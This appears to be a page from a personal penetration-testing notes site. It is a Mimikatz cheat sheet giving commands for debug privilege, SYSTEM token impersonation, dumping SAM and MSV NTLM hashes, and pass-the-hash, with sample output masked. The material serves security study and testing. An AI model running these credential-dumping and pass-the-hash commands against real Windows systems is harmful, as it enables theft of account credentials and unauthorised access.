mimikatz

Resources

  1. The Hacker Tools

LogoMimikatz 🥝The Hacker Tools

Basic commands

  1. View privilege configurations (?):

privilege::debug

  • Required to perform actions such as lsadump::sam later on

mimikatz # privilege::debug
Privilege '20' OK

  1. To impersonate a token:

token::elevate

  • particularly, a token from SYSTEM

LogoWindows.Detection.Impersonation :: Velociraptor - Digging deeper!docs.velociraptor.app
mimikatza # token::elevate

Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM

660     xxxx         NT AUTHORITY\SYSTEM     xxxx       (04g,21p)       Primary
 -> Impersonated !
 * Process Token : xxxx     XXXX     xxxx   (12g,24p)  Primary
 * Thread Token  : {0;000003e7} 1 D 1309519     NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

  1. Dump the local Security Account Manager (SAM) NT hashes:

lsadump::sam

mimikatz # lsadump::sam
Domain : xxxx
SysKey : xxxx
Local SID : xxxx

SAMKey : xxxx

RID  : xxxx (500)
User : Administrator
  Hash NTLM: xxxx
  
...

  1. Dumps NT hash by targeting the MSV1_0 Authentication Package:

lsadump::msv

mimikatz # lsadump::msv

Authentication Id : 0 ; xxxx (00000000:0004b39c)
Session           : RemoteInteractive from 2 
User Name         : xxxx
Domain            : xxxx
Logon Server      : xxxx
...

        msv :
         [00000003] Primary
         * Username : xxxx
         * Domain   : xxxx
         * NTLM     : xxxx

...

  1. Revert to original token on mimikatz startup:

token::revert 

mimikatz # token::revert

  1. Performs Pass-the-Hash, Pass-the-Key, Overpass-the-hash:

sekurlsa::pth

mimikatz # sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<nt_hash> /run:"<command_to_run>"

a. /user : username to impersonate

b. /domain : fully qualified domain name

c. /ntlm : NT hash

d. /run : command to run

  • according to The Hacker Tools (refer link in "Resources" above), it defaults to cmd.exe

PreviousResponder

Last updated